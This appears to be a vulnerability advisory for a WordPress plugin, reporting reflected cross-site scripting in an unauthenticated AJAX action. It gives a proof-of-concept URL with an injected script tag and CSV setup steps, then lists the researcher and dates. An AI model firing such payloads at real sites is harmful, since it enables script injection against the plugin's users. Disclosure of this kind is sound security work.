The plugin does not sanitise and escape a parameter before outputting it back via an AJAX action (available to both unauthenticated and authenticated users), leading to a Reflected Cross-Site Scripting
With a feed set in the plugin, open the URL below: https://example.com/wp-admin/admin-ajax.php?action=get_sw_product&title=%3Cscript%3Ealert(`xss`);%3C/script%3E Note: To set a feed, simply import the following CSV via the plugin: categoryName,awDeepLink,merchantDeepLink,awImageUrl,description,productName,deliveryCost,currency,price categoryName,awDeepLink,merchantDeepLink,awImageUrl,description,productName,deliveryCost,currency,price
cydave
cydave
Yes
2022-06-16 (about 7 months ago)
2022-06-16 (about 7 months ago)
2022-07-27 (about 6 months ago)